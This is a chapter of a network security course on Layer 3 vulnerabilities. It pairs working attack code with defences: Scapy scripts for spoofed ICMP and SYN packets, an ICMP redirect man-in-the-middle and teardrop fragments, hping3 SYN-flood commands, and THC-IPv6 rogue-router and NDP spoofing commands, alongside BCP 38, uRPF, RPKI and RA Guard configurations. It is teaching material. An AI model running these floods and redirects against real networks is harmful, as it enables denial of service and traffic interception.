Network Layer Vulnerabilities
IP spoofing, ICMP attacks, BGP hijacking, IPv6 vulnerabilities, and network layer defense strategies
Chapter 3: Network Layer Vulnerabilities
The Day YouTube Disappeared
On February 24, 2008, YouTube vanished from the internetβnot due to server failure, but because of a routing misconfiguration in Pakistan.
The Pakistani government had ordered ISPs to block YouTube within the country. Pakistan Telecom (AS17557) attempted to comply by creating an internal BGP route for YouTubeβs IP space (208.65.153.0/24). But they made a critical error: this route was advertised to upstream provider PCCW, which propagated it globally.
Within minutes, traffic destined for YouTube was being routed to Pakistanβand into a black hole. The route was more specific (/24) than YouTubeβs legitimate announcement (/22), so BGPβs longest-prefix-match rule preferred the fake route. YouTube was unreachable worldwide for nearly two hours.
This incident exposed a fundamental vulnerability: BGP, the protocol that routes all internet traffic, operates on trust. Any network can announce any IP prefix, and others will believe it. This chapter explores network layer vulnerabilitiesβfrom IP spoofing to BGP hijackingβand the defenses being developed to address them.
Network Layer Attack Surface
The network layer (Layer 3) handles addressing and routingβgetting packets from source to destination across multiple networks. Its core protocols, designed in an era of implicit trust, contain significant security weaknesses:
Network Layer Attack Surface
Network Layer Attack Surface:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββ
β INTERNET ROUTING β
β βββββββββββββββββββββββββββββββββββββββ β
β β BGP: Trust-based, no authentication β β
β β β Hijacking, leaks, de-peering β β
β βββββββββββββββββββββββββββββββββββββββ β
ββββββββββββββββββββββ¬ββββββββββββββββββββββ
β
ββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββ
β β β
β βββββββββββββββββββββββ ββββββββββββ΄βββββββββββ βββββββββββββββββββββββ β
β β IP PROTOCOL β β ICMP PROTOCOL β β IPv6 SPECIFIC β β
β β β β β β β β
β β β’ No source auth β β β’ Network recon β β β’ Extension headers β β
β β β’ Easy to spoof β β β’ Redirect attacks β β β’ NDP spoofing β β
β β β’ Fragment attacks β β β’ DoS amplification β β β’ Tunneling abuse β β
β βββββββββββββββββββββββ βββββββββββββββββββββββ βββββββββββββββββββββββ β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββMITRE ATT&CK Reference
Network layer attacks map to several ATT&CK techniques:
- T1090 - Proxy/Connection Proxy
- T1090.002 - External Proxy (BGP manipulation)
- T1557 - Adversary-in-the-Middle
- T1498 - Network Denial of Service
- T1496 - Resource Hijacking
IP Address Spoofing
Attack Overview
IP spoofing involves forging the source IP address in packet headers. Since IP provides no authentication mechanism, any sender can claim any source address.
IP Spoofing Concept
IP Spoofing Concept:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
LEGITIMATE PACKET:
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β IP Header β
β βββββββββββββββββββ βββββββββββββββββββ β
β β Source: 1.1.1.1 β β Dest: 2.2.2.2 β β
β β (Real sender) β β (Real target) β β
β βββββββββββββββββββ βββββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SPOOFED PACKET:
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β IP Header β
β βββββββββββββββββββ βββββββββββββββββββ β
β β Source: 3.3.3.3 β β Dest: 2.2.2.2 β β
β β (FORGED!) β β (Real target) β β
β βββββββββββββββββββ βββββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Attacker (1.1.1.1) claims to be 3.3.3.3Use Cases for Spoofing
IP spoofing enables several attack types:
| Use Case | Description | Bidirectional Needed? |
|---|---|---|
| Reflection/Amplification DDoS | Spoof victim as source, send to amplifiers | No |
| Bypassing IP-based access controls | Pretend to be trusted source | No (but limited use) |
| TCP session hijacking | Inject packets into existing connection | Blind (one-way) |
| SYN floods | Exhaust target resources with fake connections | No |
| Anonymizing attacks | Hide true origin of attack traffic | No |
Practical Implementation
Using Scapy (Python):
#!/usr/bin/env python3
"""
IP Spoofing Demonstration - AUTHORIZED USE ONLY
Shows how to craft packets with arbitrary source IP
"""
from scapy.all import IP, ICMP, TCP, send, conf
import argparse
def spoof_icmp(target, spoofed_source):
"""
Send ICMP echo request with spoofed source IP
Response will go to spoofed_source, not us
"""
packet = IP(src=spoofed_source, dst=target) / ICMP()
print(f"[*] Sending spoofed ICMP to {target}")
print(f"[*] Spoofed source: {spoofed_source}")
print(f"[*] Reply will go to {spoofed_source}, not to us")
send(packet, verbose=True)
def spoof_syn(target, target_port, spoofed_source):
"""
Send TCP SYN with spoofed source (SYN flood component)
"""
packet = (
IP(src=spoofed_source, dst=target) /
TCP(sport=12345, dport=target_port, flags='S', seq=1000)
)
print(f"[*] Sending spoofed SYN to {target}:{target_port}")
print(f"[*] Spoofed source: {spoofed_source}")
send(packet, verbose=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="IP Spoofing Demo")
parser.add_argument("target", help="Target IP")
parser.add_argument("spoofed", help="IP to spoof as source")
parser.add_argument("-p", "--port", type=int, default=80, help="Target port")
parser.add_argument("-t", "--type", choices=['icmp', 'syn'], default='icmp')
args = parser.parse_args()
print("[!] IP Spoofing - Educational Use Only!")
print("[!] Only use on networks you own or have authorization to test\n")
if args.type == 'icmp':
spoof_icmp(args.target, args.spoofed)
else:
spoof_syn(args.target, args.port, args.spoofed)Using hping3:
# Spoofed ICMP ping - reply goes to spoofed source
sudo hping3 -1 -a 10.0.0.100 192.168.1.1
# -1 = ICMP, -a = spoof source address
# Spoofed SYN flood
sudo hping3 -S -a 10.0.0.100 -p 80 --flood 192.168.1.1
# -S = SYN flag, --flood = fast as possible
# Random source addresses for each packet
sudo hping3 -S --rand-source -p 80 --flood 192.168.1.1Detection
Network-Level Detection:
# Look for impossible source addresses
# (RFC 1918 addresses from external interface)
# Martian addresses in logs
# Cisco IOS - Check for spoofed packets
show ip traffic | include martianIDS/Firewall Rules:
# Snort/Suricata - Detect impossible sources
alert ip any any -> $EXTERNAL_NET any (msg:"Spoofed Internal IP from External";
flow:to_server; threshold:type limit, track by_src, count 1, seconds 60;
sid:1000010; rev:1;)
# Detection indicators:
# - Internal IPs from external interface
# - Broadcast addresses as source
# - Loopback addresses externally
# - Destination as sourceMitigation
Ingress/Egress Filtering (BCP 38/RFC 2827):
Ingress Filtering ISP Edge Router
Ingress Filtering - ISP Edge Router:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Internet
β
ββββββββββ΄ββββββββββ
β ISP Router β
β β
β IF source NOT in β
β customer's block β
β THEN drop β
ββββββββββ¬ββββββββββ
β
Customer Network (10.1.0.0/16)
Only packets with source 10.1.0.0/16 allowed OUT
Prevents customer from spoofing other addressesCisco IOS Configuration:
! Ingress filtering on customer-facing interface
interface GigabitEthernet0/1
description Customer Connection
ip address 10.1.0.1 255.255.255.0
! Only allow sources from customer's network
ip verify unicast source reachable-via rx
! Or explicit ACL
ip access-group ANTISPOOFING in
! ACL for anti-spoofing
ip access-list extended ANTISPOOFING
permit ip 10.1.0.0 0.0.255.255 any
deny ip any any loguRPF (Unicast Reverse Path Forwarding):
! Enable uRPF on external interfaces
interface GigabitEthernet0/0
ip verify unicast source reachable-via rx
! rx = strict mode (packet must arrive on interface with route to source)
! any = loose mode (route to source must exist somewhere)PRO TIP
Strict uRPF can break asymmetric routing. Use loose mode in complex topologies and strict mode at network edges where routing is predictable.
ICMP Attacks
ICMP Attack Categories
ICMP (Internet Control Message Protocol) provides essential network functions but can be abused for reconnaissance, denial of service, and redirection attacks.
ICMP Attack Types
ICMP Attack Types:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββ¬βββββββββββββββββββββ¬βββββββββββββββββββββββββββ
β CATEGORY β ATTACK β ICMP TYPE β
βββββββββββββββββββΌβββββββββββββββββββββΌβββββββββββββββββββββββββββ€
β Reconnaissance β Host discovery β Type 8 (Echo Request) β
β β Path discovery β Type 11 (Time Exceeded) β
β β OS fingerprinting β Various responses β
βββββββββββββββββββΌβββββββββββββββββββββΌβββββββββββββββββββββββββββ€
β Denial of β Ping of Death β Oversized Type 8 β
β Service β Smurf attack β Broadcast Type 8 β
β β ICMP flood β Type 8 flood β
βββββββββββββββββββΌβββββββββββββββββββββΌβββββββββββββββββββββββββββ€
β Redirection β ICMP Redirect β Type 5 (Redirect) β
β β Route manipulation β Type 5, subtype 0-3 β
βββββββββββββββββββΌβββββββββββββββββββββΌβββββββββββββββββββββββββββ€
β Covert Channel β Data exfiltration β Type 0/8 (payload) β
β β C2 communication β Any type (encoding) β
βββββββββββββββββββ΄βββββββββββββββββββββ΄βββββββββββββββββββββββββββICMP Redirect Attack
ICMP Redirect tells a host to use a different gateway for a specific destination. An attacker can use this to redirect traffic.
ICMP Redirect Attack
ICMP Redirect Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
NORMAL ROUTING:
Victim βββββββββΊ Gateway βββββββββΊ Internet βββββββββΊ Server
(10.0.0.100) (10.0.0.1) (1.2.3.4)
ATTACK:
1. Attacker sends ICMP Redirect:
"For 1.2.3.4, use gateway 10.0.0.50" (attacker's IP)
2. Victim updates routing table
3. NEW PATH:
Victim βββββββββΊ Attacker βββββββββΊ Gateway βββββββββΊ Server
(10.0.0.100) (10.0.0.50) (10.0.0.1) (1.2.3.4)
(MITM!)Using Scapy:
#!/usr/bin/env python3
"""
ICMP Redirect Attack - AUTHORIZED USE ONLY
Redirects victim's traffic through attacker
"""
from scapy.all import IP, ICMP, send
def icmp_redirect(victim_ip, target_dst, fake_gateway, real_gateway):
"""
Send ICMP redirect to victim
Args:
victim_ip: IP of machine to redirect
target_dst: Destination IP to redirect
fake_gateway: Gateway to use (attacker)
real_gateway: Appears to come from real gateway
"""
# ICMP Redirect packet
# Type 5, Code 1 = Redirect for Host
packet = (
IP(src=real_gateway, dst=victim_ip) /
ICMP(type=5, code=1, gw=fake_gateway) /
IP(src=victim_ip, dst=target_dst) # Original packet header
)
print(f"[*] Sending ICMP Redirect to {victim_ip}")
print(f"[*] Redirecting traffic for {target_dst} via {fake_gateway}")
send(packet, verbose=True)
if __name__ == "__main__":
import sys
print("[!] ICMP Redirect Attack - Educational Use Only!")
print("[!] Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward")
# Example: Redirect victim's traffic to server.com through us
# icmp_redirect("192.168.1.100", "93.184.216.34", "192.168.1.50", "192.168.1.1")Smurf Attack (Historical)
The Smurf attack used broadcast amplification to overwhelm targets. While largely mitigated, understanding it illustrates amplification principles.
Smurf Attack Flow
Smurf Attack Flow:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1. Attacker sends ICMP Echo Request to broadcast address
Source IP = Victim's IP (SPOOFED)
Destination = 10.0.0.255 (broadcast)
2. Every host on network responds to victim
Attacker βββββββΊ Broadcast Network βββββββΊ Victim
(spoofed src) 100 hosts 100 replies!
respond
Amplification factor = number of hosts on broadcast networkDetection and Mitigation
Disable ICMP Redirect Acceptance:
# Linux - Disable ICMP redirects
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects
# Permanent (sysctl.conf)
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0Router Configuration:
! Cisco IOS - Disable ICMP redirects
interface GigabitEthernet0/0
no ip redirects
! Rate limit ICMP
ip icmp rate-limit unreachable 500Firewall Rules:
# iptables - Block ICMP redirects
iptables -A INPUT -p icmp --icmp-type redirect -j DROP
iptables -A OUTPUT -p icmp --icmp-type redirect -j DROP
# Rate limit ping
iptables -A INPUT -p icmp --icmp-type echo-request \
-m limit --limit 1/s --limit-burst 4 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j DROPIP Fragmentation Attacks
Overview
IP fragmentation allows large packets to be split for transmission across networks with smaller MTUs. Attackers can abuse this for evasion and denial of service.
IP Fragment Structure
IP Fragment Structure:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Original Packet (4000 bytes):
βββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β IP Header β Data β
β 20B β 3980B β
βββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββ
Fragmented (MTU 1500):
Fragment 1: Fragment 2: Fragment 3:
ββββββββ¬ββββββββββββββββ βββββββββ¬βββββββββββββββ βββββββββ¬βββββββ
βIP Hdrβ Data β βIP Hdr β Data β βIP Hdr β Data β
βMF=1 β 1480B β βMF=1 β 1480B β βMF=0 β1020B β
βOff=0 β β βOff=185β β βOff=370β β
ββββββββ΄ββββββββββββββββ βββββββββ΄βββββββββββββββ βββββββββ΄βββββββ
MF = More Fragments flag
Off = Fragment Offset (in 8-byte units)Fragmentation Attack Types
Teardrop Attack (Historical): Overlapping fragments cause crash during reassembly.
from scapy.all import IP, ICMP, send
def teardrop(target):
"""
Teardrop - overlapping fragments (historical, mostly patched)
"""
# First fragment
frag1 = IP(dst=target, flags='MF', frag=0) / ('X' * 100)
# Second fragment overlaps first
frag2 = IP(dst=target, frag=8) / ('Y' * 100) # Overlaps!
send(frag1)
send(frag2)Tiny Fragment Attack: TCP header split across fragments to evade firewalls.
Tiny Fragment Attack
Tiny Fragment Attack:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Normal TCP Packet:
βββββββββββββββββββ¬βββββββββββββββββββ¬βββββββββββββββββββββββββββββ
β IP Header (20B) β TCP Header (20B) β Data β
β β Src Port: 12345 β β
β β Dst Port: 80 β β
β β Flags: SYN β β
βββββββββββββββββββ΄βββββββββββββββββββ΄βββββββββββββββββββββββββββββ
β²
Firewall checks this and blocks if needed
Tiny Fragment Attack:
Fragment 1 (24 bytes): Fragment 2:
βββββββββββββ¬βββββββββββββββββ ββββββββββββββ¬ββββββββββββββββββ
β IP Header β TCP (4 bytes) β β IP Header β TCP (16B) + Dataβ
β MF=1 β Src Port only β β Frag offsetβ DST PORT + flagsβ
β Frag=0 β β β β β
βββββββββββββ΄βββββββββββββββββ ββββββββββββββ΄ββββββββββββββββββ
β²
Firewall can't see dst port/flags!
May allow through for reassemblyMitigation
! Cisco IOS - Block tiny fragments
access-list 101 deny ip any any fragments
! Note: May impact legitimate traffic
! Better: Virtual Fragment Reassembly
ip virtual-reassembly
! Modern approach: Stateful inspection
! Reassemble before inspectionLinux:
# Tune fragment handling
echo 30 > /proc/sys/net/ipv4/ipfrag_time # Timeout (seconds)
echo 4194304 > /proc/sys/net/ipv4/ipfrag_high_thresh # Max memory
# Drop fragments with iptables
iptables -A INPUT -f -j DROPBGP Hijacking
Attack Overview
BGP hijacking occurs when a network announces IP prefixes it doesnβt own, causing traffic to be misrouted globally. This can be accidental (misconfiguration) or malicious (interception, DoS).
BGP Hijacking Types
BGP Hijacking Types:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
TYPE 1: PREFIX HIJACK (Exact Match)
ββββββββββββββββββββββββββββββββββββ
Legitimate: AS100 announces 192.0.2.0/24
Attacker: AS666 announces 192.0.2.0/24
Result: Traffic split based on AS path length
Some routes prefer attacker's announcement
TYPE 2: SUB-PREFIX HIJACK (More Specific)
βββββββββββββββββββββββββββββββββββββββββ
Legitimate: AS100 announces 192.0.2.0/24
Attacker: AS666 announces 192.0.2.0/25 (more specific!)
Result: Longest prefix match β ALL traffic to attacker
This is what happened to YouTube
TYPE 3: AS PATH MANIPULATION
ββββββββββββββββββββββββββββ
Legitimate: AS100 β AS200 β 192.0.2.0/24 (path length 2)
Attacker: AS666 β 192.0.2.0/24 (path length 1)
Result: Shorter path wins, traffic to attackerReal-World BGP Incidents
| Year | Date | Incident | Impact |
|---|---|---|---|
| 2008 | Feb 24 | Pakistan Telecom (AS17557) / YouTube | Global YouTube outage (~2 hours). Pakistan government ordered YouTube block; route leaked to PCCW, propagated globally. |
| 2010 | Apr 8 | China Telecom (AS4134) | ~37,000 prefixes (15% of routes) hijacked for 18 minutes. Affected U.S. government, military, and commercial sites. |
| 2017 | Dec 12 | Rostelecom (AS12389) / Russia | Traffic for Google, Apple, Facebook, Microsoft, and ~80 prefixes routed through Russia for 12 minutes. |
| 2018 | Apr 24 | eNet (AS10297) / Amazon Route53 | DNS traffic hijacked to steal ~$150,000 in Ethereum from MyEtherWallet users. |
| 2019 | Jun 6 | China Telecom (AS4134) / European ISPs | Traffic from Swisscom, KPN, Bouygues Telecom routed through China for over 2 hours. |
| 2022 | Mar 28 | RTComm (AS8342) / Twitter, Russia | Twitter prefixes briefly announced during Russia-Ukraine conflict, part of broader network interference. |
BGP Interception (vs Hijacking)
Smart attackers maintain connectivity while intercepting:
BGP Interception Flow
BGP Interception Flow:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
SIMPLE HIJACK (Traffic blackholed):
User βββββΊ (AS666 announces prefix) βββββΊ Blackhole
Traffic never reaches real destination
INTERCEPTION (Traffic forwarded):
User βββββΊ AS666 βββββΊ AS123 βββββΊ Legitimate AS100
β β
βββ Attacker inspects ββββ
and forwards
How to maintain path to legitimate AS:
1. Announce to most peers
2. Don't announce to path toward legitimate AS
3. Traffic still routes to legitimate AS from attacker
4. Attacker can inspect/modify in transitDetection
BGP Monitoring Tools:
| Tool | Description | URL |
|---|---|---|
| RIPE RIS | Real-time BGP data | ris.ripe.net |
| BGPStream | Historical BGP data | bgpstream.com |
| Cloudflare Radar | BGP anomaly detection | radar.cloudflare.com |
| ThousandEyes | Commercial monitoring | thousandeyes.com |
| BGPalerter | Open source alerting | github.com/nttgin/BGPalerter |
Setting Up Monitoring:
# Install BGPalerter
npm install -g bgpalerter
# Configure prefixes to monitor (prefixes.yml)
# Run monitoring
bgpalerter
# Example alert:
# ALERT: More specific prefix announced
# Your prefix: 203.0.113.0/24
# Hijacker: 203.0.113.0/25 from AS666Mitigation: RPKI
Resource Public Key Infrastructure (RPKI) cryptographically validates BGP route origins.
RPKI Overview
RPKI Overview:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WITHOUT RPKI:
Any AS can announce any prefix
BGP routers blindly trust announcements
WITH RPKI:
1. Prefix owner creates ROA (Route Origin Authorization)
"AS100 is authorized to announce 192.0.2.0/24"
2. ROA signed with owner's RPKI certificate
3. BGP routers validate announcements against ROAs:
- VALID: ROA exists, AS matches
- INVALID: ROA exists, AS doesn't match β DROP
- NOT FOUND: No ROA (legacy, typically accept)
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ROA Validation β
β β
β Announcement: AS666 β 192.0.2.0/24 β
β ROA says: AS100 authorized for 192.0.2.0/24 β
β Result: INVALID β Route rejected β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββConfiguring RPKI Validation (Cisco IOS-XR):
! Configure RPKI server connection
router bgp 65001
rpki server 192.0.2.10
transport tcp port 3323
refresh-time 60
!
! Drop invalid routes
address-family ipv4 unicast
bgp origin-as validation signal-ibgp
!
neighbor 10.0.0.1
address-family ipv4 unicast
route-policy RPKI-VALIDATION in
!
route-policy RPKI-VALIDATION
if validation-state is invalid then
drop
endif
pass
end-policyAdditional BGP Security
Prefix Filtering:
! Accept only expected prefixes from customer
ip prefix-list CUSTOMER-PREFIXES permit 203.0.113.0/24
!
route-map CUSTOMER-IN permit 10
match ip address prefix-list CUSTOMER-PREFIXES
route-map CUSTOMER-IN deny 100
!
router bgp 65001
neighbor 10.0.0.1 route-map CUSTOMER-IN inMaximum Prefix Limits:
! Protect against prefix explosion
router bgp 65001
neighbor 10.0.0.1 maximum-prefix 100 warning-onlyBGP TTL Security (GTSM):
! Only accept BGP from directly connected peers
router bgp 65001
neighbor 10.0.0.1 ttl-security hops 1IPv6-Specific Vulnerabilities
NDP Spoofing (IPv6 ARP Spoofing)
IPv6 uses Neighbor Discovery Protocol (NDP) instead of ARP. It has similar vulnerabilities.
NDP Spoofing
NDP Spoofing:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
IPv6 Neighbor Discovery:
- Neighbor Solicitation (NS) = ARP Request
- Neighbor Advertisement (NA) = ARP Reply
- Uses ICMPv6 (not separate protocol like ARP)
ATTACK:
Same as ARP spoofing but with ICMPv6 NA messages
Victim βββββ Fake NA: "Gateway fe80::1 is at attacker-MAC" ββββ€
β
Gateway βββ Fake NA: "Victim fe80::2 is at attacker-MAC" ββββββ€
β
AttackerUsing THC-IPv6:
# Install THC-IPv6 toolkit
apt install thc-ipv6
# NDP spoofing (like arpspoof for IPv6)
sudo parasite6 eth0
# Or targeted
sudo fake_advertise6 eth0 <target-ipv6> <gateway-ipv6>Router Advertisement Attacks
IPv6 hosts auto-configure using Router Advertisements (RA). Malicious RAs can hijack traffic.
RA Attack Scenarios
RA Attack Scenarios:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ATTACK 1: FAKE DEFAULT ROUTER
βββββββββββββββββββββββββββββ
Attacker sends RA: "I'm the default router"
Victims: Update default gateway to attacker
ATTACK 2: SLAAC MANIPULATION
ββββββββββββββββββββββββββββ
Attacker sends RA with malicious prefix
Victims: Auto-configure address in attacker's prefix
ATTACK 3: DNS HIJACKING VIA RA
ββββββββββββββββββββββββββββββ
RA can include RDNSS option (DNS server)
Attacker sends RA with malicious DNS
Victims: Use attacker's DNS serverUsing THC-IPv6:
# Become default router
sudo fake_router6 eth0 fe80::1
# With DNS hijacking
sudo fake_router6 eth0 fe80::1 -D <dns-server>IPv6 Extension Header Abuse
IPv6 extension headers can evade security controls.
Extension Header Evasion
Extension Header Evasion:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
IPv6 header chain:
ββββββββββ¬βββββββββ¬βββββββββ¬ββββββββββ¬ββββββββββ
β IPv6 β Hop-by β Routingβ Fragmentβ TCP β
β Header β -Hop β Header β Header β Header β
ββββββββββ΄βββββββββ΄βββββββββ΄ββββββββββ΄ββββββββββ
β
βββ Firewalls may not parse entire chain
Headers can hide true destination/payloadIPv6 Mitigation
RA Guard (Cisco):
! Block rogue RAs on access ports
interface GigabitEthernet0/1
switchport mode access
ipv6 nd raguard
! Trust router port
interface GigabitEthernet0/24
ipv6 nd raguard routerSEND (Secure NDP):
! Enable SEND (requires PKI)
ipv6 nd securedLinux RA filtering:
# Ignore RAs on interface
echo 0 > /proc/sys/net/ipv6/conf/eth0/accept_ra
# Use firewall
ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j DROPLab Exercise: Network Layer Attack Chain
Objective
Demonstrate IP spoofing detection and BGP monitoring concepts.
Environment
Lab Network
Lab Network:
βββ Attacker: Kali Linux (192.168.1.50)
βββ Target: Ubuntu Server (192.168.1.100)
βββ Router/Firewall: pfSense (192.168.1.1)
βββ Monitoring: Security Onion or WiresharkExercise 1: IP Spoofing Detection
# On Attacker (Kali):
# Send spoofed packets
sudo hping3 -1 -a 192.168.1.200 192.168.1.100 -c 5
# On Target (capture):
sudo tcpdump -i eth0 icmp -nn
# Observe: ICMP from 192.168.1.200 (which doesn't exist)
# Detection: Compare source IP against actual network assignmentsExercise 2: ICMP Redirect Observation
# Capture ICMP redirects
sudo tcpdump -i eth0 'icmp[icmptype] = 5' -nn -v
# Generate redirect (on router):
# Enable redirects and trigger with routing change
# Defense: Verify redirect acceptance is disabled
cat /proc/sys/net/ipv4/conf/all/accept_redirectsExercise 3: BGP Monitoring Setup
# Install BGPalerter
npm install -g bgpalerter
# Create config for your prefixes
# Monitor for anomalies via RIPE RIS data stream
# Educational: Explore BGP data at
# https://stat.ripe.net/
# https://bgpstream.com/Key Takeaways
-
IP spoofing is trivial without egress filteringβISPs should implement BCP 38
-
ICMP attacks range from reconnaissance to DoS to traffic redirectionβrate limit and filter appropriately
-
BGP hijacking can redirect internet traffic globallyβRPKI provides cryptographic validation
-
IPv6 introduces new attack surfaces with NDP, RA, and extension headersβapply IPv6-specific security controls
-
Defense requires multiple layers: filtering, monitoring, cryptographic validation, and proper configuration
Self-Assessment
-
Comprehension: Why does longest-prefix-match make sub-prefix BGP hijacking so effective?
-
Application: A host is receiving ICMP redirects changing its default gateway. How would you detect and prevent this?
-
What if: Your organizationβs IP prefix appears in BGP from an unauthorized AS. What immediate steps would you take?
Review Questions
- What is IP spoofing and what attacks does it enable?
- How does ingress/egress filtering (BCP 38) prevent spoofing?
- Explain the difference between BGP hijacking and BGP interception.
- How does RPKI validate BGP route origins?
- What makes NDP spoofing similar to ARP spoofing?
- How can Router Advertisement attacks compromise IPv6 hosts?
MITRE ATT&CK Mapping
| Attack | Technique ID | Tactic |
|---|---|---|
| IP Spoofing | T1090.002 | Command and Control |
| ICMP Redirect | T1557 | Credential Access |
| BGP Hijacking | T1557 | Collection |
| IPv6 NDP Spoofing | T1557.002 | Credential Access |
| Fragmentation Evasion | T1027 | Defense Evasion |